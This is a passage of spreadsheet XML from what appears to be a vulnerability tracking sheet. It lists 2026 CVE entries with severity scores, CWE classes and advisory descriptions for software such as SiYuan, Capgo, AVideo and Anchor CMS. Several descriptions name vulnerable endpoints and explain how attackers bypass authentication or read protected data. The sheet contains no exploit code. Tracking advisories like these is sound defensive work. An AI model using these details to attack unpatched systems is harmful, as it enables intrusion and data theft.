        </is>
      </c>
      <c r="B1352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87807</t>
        </is>
      </c>
      <c r="C1352" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1352" s="5" t="inlineStr"/>
      <c r="F1352" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1352" s="5" t="inlineStr"/>
      <c r="H1352" s="5" t="inlineStr"/>
      <c r="I1352" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1352" s="5" t="inlineStr"/>
      <c r="K1352" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1352" s="5" t="inlineStr">
        <is>
          <t>siyuan versions before v3.8.2 contain an authenticated SQL injection vulnerability in the fullTextSearchBlock endpoint's method=1 query parameter. Attackers can inject UNION SELECT statements to read the entire blocks table, bypassing publish-access controls and exposing all document content and sensitive attributes.</t>
        </is>
      </c>
      <c r="M1352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87807</t>
        </is>
      </c>
    </row>
    <row r="1353">
      <c r="A1353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87808</t>
        </is>
      </c>
      <c r="C1353" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1353" s="5" t="inlineStr"/>
      <c r="F1353" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1353" s="5" t="inlineStr"/>
      <c r="H1353" s="5" t="inlineStr"/>
      <c r="I1353" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1353" s="5" t="inlineStr"/>
      <c r="K1353" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L1353" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions &lt;= 3.8.1 contain an incomplete fix for CVE-2026-32767 (GHSA-j7wh-x834-p3r7). The prior fix (commit d5e2d0bc) added an administrator check for SQL mode (method=2) in POST /api/search/fullTextSearchBlock, but the endpoint still does not enforce the application's read-only boundary: for method=2 it forwards caller-supplied SQL to the blocks database query path without calling model.CheckReadonly or CheckReadonlyStatementInBox. As a result, when a workspace runs in read-only mode (--readonly=true), an authenticated administrator can submit arbitrary SQL through /api/search/fullTextSearchBlock and obtain raw read access to the blocks database, even though the dedicated /api/query/sql endpoint is blocked in that mode. Fixed in v3.8.2.</t>
        </is>
      </c>
      <c r="M1353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87808</t>
        </is>
      </c>
    </row>
    <row r="1354">
      <c r="A1354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87816</t>
        </is>
      </c>
      <c r="C1354" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1354" s="5" t="inlineStr"/>
      <c r="F1354" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1354" s="5" t="inlineStr"/>
      <c r="H1354" s="5" t="inlineStr"/>
      <c r="I1354" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1354" s="5" t="inlineStr"/>
      <c r="K1354" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L1354" s="5" t="inlineStr">
        <is>
          <t>PasswordPusher before 2.11.1 contains a time-of-check-to-time-of-use race condition in view limit enforcement that allows unauthenticated attackers to bypass expire_after_views limits. Attackers can send concurrent requests to the show endpoint to access one-time secrets multiple times before the view count is incremented and the push expires.</t>
        </is>
      </c>
      <c r="M1354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87816</t>
        </is>
      </c>
    </row>
    <row r="1355">
      <c r="A1355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87817</t>
        </is>
      </c>
      <c r="C1355" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1355" s="5" t="inlineStr"/>
      <c r="F1355" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1355" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1355" s="5" t="inlineStr"/>
      <c r="I1355" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1355" s="5" t="inlineStr"/>
      <c r="K1355" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1355"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M1355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87817</t>
        </is>
      </c>
    </row>
    <row r="1356">
      <c r="A1356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87819</t>
        </is>
      </c>
      <c r="C1356" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1356" s="5" t="inlineStr"/>
      <c r="F1356" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1356" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1356" s="5" t="inlineStr"/>
      <c r="I1356" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1356" s="5" t="inlineStr"/>
      <c r="K1356" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L1356"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M1356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87819</t>
        </is>
      </c>
    </row>
    <row r="1357">
      <c r="A1357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87822</t>
        </is>
      </c>
      <c r="C1357" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1357" s="5" t="inlineStr"/>
      <c r="F1357" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1357" s="5" t="inlineStr"/>
      <c r="H1357" s="5" t="inlineStr"/>
      <c r="I1357" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1357" s="5" t="inlineStr"/>
      <c r="K1357" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1357" s="5" t="inlineStr">
        <is>
          <t>t-digest versions 3.1 through 3.3 fail to validate centroid means during deserialization in MergingDigest.fromBytes, allowing attackers to inject NaN values that bypass validation checks. Attackers can craft malicious serialized digests containing NaN centroids that degrade sorting performance from O(n log n) to O(n squared), causing severe processing delays during merge operations.</t>
        </is>
      </c>
      <c r="M1357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87822</t>
        </is>
      </c>
    </row>
    <row r="1358">
      <c r="A1358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87824</t>
        </is>
      </c>
      <c r="C1358" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1358" s="5" t="inlineStr"/>
      <c r="F1358" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1358" s="5" t="inlineStr"/>
      <c r="H1358" s="5" t="inlineStr"/>
      <c r="I1358" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1358" s="5" t="inlineStr"/>
      <c r="K1358" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1358" s="5" t="inlineStr">
        <is>
          <t>zstd-jni before 1.5.7-14 fails to validate the samples buffer capacity in Zstd.trainFromBufferDirect, allowing attackers to read past buffer boundaries by supplying oversized per-sample lengths. Attackers can trigger out-of-bounds memory access by providing crafted sample length arrays that cause the native implementation to walk past the buffer allocation, resulting in JVM termination.</t>
        </is>
      </c>
      <c r="M1358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87824</t>
        </is>
      </c>
    </row>
    <row r="1359">
      <c r="A1359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87962</t>
        </is>
      </c>
      <c r="C1359" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1359" s="5" t="inlineStr"/>
      <c r="F1359" s="5" t="inlineStr"/>
      <c r="G1359" s="5" t="inlineStr"/>
      <c r="H1359" s="5" t="inlineStr"/>
      <c r="I1359" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1359" s="5" t="inlineStr"/>
      <c r="K1359" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L1359" s="5" t="inlineStr">
        <is>
          <t>t-digest versions 3.1 through 3.3 contain a denial of service vulnerability in MergingDigest.fromBytes that fails to validate length and capacity fields from serialized data. Attackers can supply crafted serialized digests with mismatched header fields to trigger ArrayIndexOutOfBoundsException or NegativeArraySizeException, aborting the parsing thread.</t>
        </is>
      </c>
      <c r="M1359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87962</t>
        </is>
      </c>
    </row>
    <row r="1360">
      <c r="A1360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87995</t>
        </is>
      </c>
      <c r="C1360" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1360" s="5" t="inlineStr"/>
      <c r="F1360" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1360" s="5" t="inlineStr"/>
      <c r="H1360" s="5" t="inlineStr"/>
      <c r="I1360" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1360" s="5" t="inlineStr"/>
      <c r="K1360" s="5" t="inlineStr">
        <is>
          <t>CWE-1021, CWE-79</t>
        </is>
      </c>
      <c r="L1360" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.8.11 until 0.11.1, src/lib/components/chat/FileNav/PortPreview.svelte rendered terminal port content in an iframe sandbox containing both allow-scripts and allow-same-origin. Because the terminal proxy serves that content from the Open WebUI origin, an authenticated user with access to a shared terminal server could host script on a previewed port and take over a victim's account when the victim opened the preview. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M1360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87995</t>
        </is>
      </c>
    </row>
    <row r="1361">
      <c r="A1361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88260</t>
        </is>
      </c>
      <c r="C1361" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1361" s="5" t="inlineStr"/>
      <c r="F1361" s="5" t="inlineStr"/>
      <c r="G1361" s="5" t="inlineStr"/>
      <c r="H1361" s="5" t="inlineStr"/>
      <c r="I1361" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1361" s="5" t="inlineStr"/>
      <c r="K1361" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-288</t>
        </is>
      </c>
      <c r="L1361" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass using an alternate path or channel and Improper validation of syntactic correctness of input vulnerability in Brainzcompany Zenius EMS 8.0 allows Remote Code Inclusion.
This issue affects Zenius EMS 8.0: through OAM (Build 109).</t>
        </is>
      </c>
      <c r="M1361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88260</t>
        </is>
      </c>
    </row>
    <row r="1362">
      <c r="A1362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88861</t>
        </is>
      </c>
      <c r="C1362" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1362" s="5" t="inlineStr"/>
      <c r="F1362" s="5" t="inlineStr"/>
      <c r="G1362" s="5" t="inlineStr"/>
      <c r="H1362" s="5" t="inlineStr"/>
      <c r="I1362" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1362" s="5" t="inlineStr"/>
      <c r="K1362" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L1362" s="5" t="inlineStr">
        <is>
          <t>Capgo (Cap-go/capgo.app) contains an authentication bypass affecting all versions (no patched version available at time of publication). The Edge authorization path allows a password-only Supabase aal1 session to exercise privileged RBAC permissions even when the account has a verified MFA factor that has not been used for the session: the Edge JWT middleware (foundJWT() in supabase/functions/_backend/utils/hono_middleware.ts) accepts the JWT without validating its assurance level, and the direct RBAC path (checkPermission()/checkPermissionPg() in supabase/functions/_backend/utils/rbac.ts calling public.rbac_check_permission_direct()) authorizes by user ID without passing or checking the session aal, unlike the public.verify_mfa() control which correctly requires aal2. An attacker who knows only the victim's password can therefore authenticate, mint a persistent app-scoped app_admin API key that remains valid after the aal1 session is logged out, and perform privileged operations such as modifying production OTA channel configurations (validated by changing a public production channel from bundle 1.0.0 to 1.0.1), defeating the protection provided by MFA.</t>
        </is>
      </c>
      <c r="M1362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88861</t>
        </is>
      </c>
    </row>
    <row r="1363">
      <c r="A1363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88862</t>
        </is>
      </c>
      <c r="C1363" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1363" s="5" t="inlineStr"/>
      <c r="F1363" s="5" t="inlineStr"/>
      <c r="G1363" s="5" t="inlineStr"/>
      <c r="H1363" s="5" t="inlineStr"/>
      <c r="I1363" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1363" s="5" t="inlineStr"/>
      <c r="K1363" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1363" s="5" t="inlineStr">
        <is>
          <t>Capgo (capgo.app) backend through 12.242.4 does not validate parent-child delegation when processing the x-limited-key-id header. checkKeyByIdPg() in supabase/functions/_backend/utils/hono_middleware.ts resolves the attacker-supplied numeric API key ID using only the key ID, its expiration state, and the authenticating key's user_id, while hasLimitedRbacSubkeyScope() accepts any key with a non-organization (e.g., app-scoped) RBAC binding and validateSubkeyUser() only compares owning user IDs. Because Capgo treats API keys as independent RBAC principals with separate role bindings, an authenticated apikey_manager API key with no application access can supply the numeric ID of a more privileged same-owner key and have the middleware replace the authenticated principal and effective API-key secret with that key (setSubkeyAuthContext), exercising an app_admin sibling's permissions without knowing or submitting its secret. The issue was reproduced on release 12.242.4 (commit b3d02cdbc23ac59990785acacd1f113c07458568) after the fix for GHSA-8h52-44r7-w343; at the time of the advisory no patched version was available.</t>
        </is>
      </c>
      <c r="M1363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88862</t>
        </is>
      </c>
    </row>
    <row r="1364">
      <c r="A1364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88874</t>
        </is>
      </c>
      <c r="C1364" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1364" s="5" t="inlineStr"/>
      <c r="F1364" s="5" t="inlineStr"/>
      <c r="G1364" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H1364" s="5" t="inlineStr"/>
      <c r="I1364" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1364" s="5" t="inlineStr"/>
      <c r="K1364" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1364" s="5" t="inlineStr">
        <is>
          <t>AVideo through revision c3edcc274c389816d434acadac07ee78eaf330c1 (master, 2026-08-23) does not enforce the Live stream password check on the stats endpoint or on the HLS origin. Live::_getStats() (plugin/Live/Live.php) returns a password-protected transmission's RTMP stream key, its isPasswordProtected flag, and its HLS (m3u8) URL to unauthenticated callers, in both the public applications list and the hidden_applications branch used when canSeeLiveFromLiveKey() fails. Separately, the shipped NGINX configuration (deploy/nginx/nginx.conf) serves the .m3u8 playlist, the AES-128 key, and the transport-stream segments from the /live location without any auth_request (the auth_key_check directive in the .key location is commented out). A remote, unauthenticated attacker can therefore retrieve the stream key and decryption key and watch a password-protected live transmission without supplying the configured password. No patched version was available at the time of the advisory.</t>
        </is>
      </c>
      <c r="M1364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88874</t>
        </is>
      </c>
    </row>
    <row r="1365">
      <c r="A1365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88876</t>
        </is>
      </c>
      <c r="C1365" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1365" s="5" t="inlineStr"/>
      <c r="F1365" s="5" t="inlineStr"/>
      <c r="G1365" s="5" t="inlineStr"/>
      <c r="H1365" s="5" t="inlineStr"/>
      <c r="I1365" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1365" s="5" t="inlineStr"/>
      <c r="K1365" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1365" s="5" t="inlineStr">
        <is>
          <t>AVideo through revision c3edcc274c389816d434acadac07ee78eaf330c1 contains a missing authorization vulnerability in plugin/PlayerSkins/seo.php that allows unauthenticated attackers to access password-protected video sources by calling getSources() without password validation. Attackers can request the seo.php endpoint with a video ID to obtain the direct MP4 URL and read protected media bytes without supplying the configured password.</t>
        </is>
      </c>
      <c r="M1365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88876</t>
        </is>
      </c>
    </row>
    <row r="1366">
      <c r="A1366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88893</t>
        </is>
      </c>
      <c r="C1366" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1366" s="5" t="inlineStr"/>
      <c r="F1366" s="5" t="inlineStr"/>
      <c r="G1366" s="5" t="inlineStr"/>
      <c r="H1366" s="5" t="inlineStr"/>
      <c r="I1366" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1366" s="5" t="inlineStr"/>
      <c r="K1366" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1366" s="5" t="inlineStr">
        <is>
          <t>OpenPanel share lookup procedures fail to validate access controls and return password hashes and protected report definitions to unauthenticated callers. Attackers with a share link can retrieve argon2id password hashes and full report configurations including event names, filters, and breakdown dimensions for offline password cracking and business intelligence theft.</t>
        </is>
      </c>
      <c r="M1366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88893</t>
        </is>
      </c>
    </row>
    <row r="1367">
      <c r="A1367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88939</t>
        </is>
      </c>
      <c r="C1367" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1367" s="5" t="inlineStr"/>
      <c r="F1367" s="5" t="inlineStr"/>
      <c r="G1367" s="5" t="inlineStr"/>
      <c r="H1367" s="5" t="inlineStr"/>
      <c r="I1367" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1367" s="5" t="inlineStr"/>
      <c r="K1367" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1367" s="5" t="inlineStr">
        <is>
          <t>knowns through 0.33.0 exempts the project.set action from permission guard checks unconditionally, allowing read-only agent sessions to bypass restrictions. Attackers can invoke project.set to repoint the server at another project directory and obtain write access capabilities.</t>
        </is>
      </c>
      <c r="M1367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88939</t>
        </is>
      </c>
    </row>
    <row r="1368">
      <c r="A1368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88959</t>
        </is>
      </c>
      <c r="C1368" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1368" s="5" t="inlineStr"/>
      <c r="F1368" s="5" t="inlineStr"/>
      <c r="G1368" s="5" t="inlineStr"/>
      <c r="H1368" s="5" t="inlineStr"/>
      <c r="I1368" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1368" s="5" t="inlineStr"/>
      <c r="K1368" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1368" s="5" t="inlineStr">
        <is>
          <t>Anchor CMS through 0.12.7 fails to enforce role-based access control in admin user-management endpoints, allowing any authenticated low-privilege user to create administrator accounts or modify existing ones. Attackers with editor or user roles can POST directly to admin/users/add or admin/users/edit endpoints to create new administrator accounts or change the existing administrator's password, gaining full administrative access.</t>
        </is>
      </c>
      <c r="M1368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88959</t>
        </is>
      </c>
    </row>
    <row r="1369">
      <c r="A1369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89146</t>
        </is>
      </c>
      <c r="C1369" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1369" s="5" t="inlineStr"/>
      <c r="F1369" s="5" t="inlineStr"/>
      <c r="G1369" s="5" t="inlineStr"/>
      <c r="H1369" s="5" t="inlineStr"/>
      <c r="I1369" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1369" s="5" t="inlineStr"/>
      <c r="K1369" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-617</t>
        </is>
      </c>
      <c r="L1369" s="5" t="inlineStr">
        <is>
          <t>libp2p-rendezvous through 0.17.1 fails to validate registration TTL values in discovery responses, allowing attackers to trigger timer arithmetic overflow. A malicious rendezvous server can send a discovery response with an unbounded TTL value that causes the client node process to panic when computing the expiry timer.</t>
        </is>
      </c>
      <c r="M1369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89146</t>
        </is>
      </c>
    </row>
    <row r="1370">
      <c r="A1370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89147</t>
        </is>
      </c>
      <c r="C1370" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1370" s="5" t="inlineStr"/>
      <c r="F1370" s="5" t="inlineStr"/>
      <c r="G1370" s="5" t="inlineStr"/>
      <c r="H1370" s="5" t="inlineStr"/>
      <c r="I1370" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1370" s="5" t="inlineStr"/>
      <c r="K1370" s="5" t="inlineStr">
        <is>
          <t>CWE-1088, CWE-400</t>
        </is>
      </c>
      <c r="L1370" s="5" t="inlineStr">
        <is>
          <t>Net-SNMP through 5.9.5.2 contains a denial of service vulnerability in the SMUX module where smux_accept() performs an unauthenticated blocking read without timeout on newly accepted connections. An unauthenticated remote client can connect to the SMUX listener and send no data, causing the single-threaded snmpd main loop to block indefinitely and suspend all SNMP processing.</t>
        </is>
      </c>
      <c r="M1370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89147</t>
        </is>
      </c>
    </row>
    <row r="1371">
      <c r="A1371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89174</t>
        </is>
      </c>
      <c r="C1371" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1371" s="5" t="inlineStr"/>
      <c r="F1371" s="5" t="inlineStr"/>
      <c r="G1371" s="5" t="inlineStr"/>
      <c r="H1371" s="5" t="inlineStr"/>
      <c r="I1371" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1371" s="5" t="inlineStr"/>
      <c r="K1371" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L1371" s="5" t="inlineStr">
        <is>
          <t>Smart Video Intercom System developed by Kingdom Communication Associated has a Missing Brute-force Protection vulnerability. Unauthenticated remote attackers can gain access to valid accounts through a large number of login attempts.</t>
        </is>
      </c>
      <c r="M1371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89174</t>
        </is>
      </c>
    </row>
    <row r="1372">
      <c r="A1372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89176</t>
        </is>
      </c>
      <c r="C1372" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1372" s="5" t="inlineStr"/>
      <c r="F1372" s="5" t="inlineStr"/>
      <c r="G1372" s="5" t="inlineStr"/>
      <c r="H1372" s="5" t="inlineStr"/>
      <c r="I1372" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1372" s="5" t="inlineStr"/>
      <c r="K1372" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1372" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system developed by Howyar Technologies, has a Missing Authentication vulnerability. Unauthenticated attackers on the same network can easily spoof student or teacher endpoints. Impersonating a student can disrupt normal classroom operations, whereas impersonating a teacher can induce student computers to initiate connections, thereby gaining remote control over the student endpoints.</t>
        </is>
      </c>
      <c r="M1372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89176</t>
        </is>
      </c>
    </row>
    <row r="1373">
      <c r="A1373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89177</t>
        </is>
      </c>
      <c r="C1373" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1373" s="5" t="inlineStr"/>
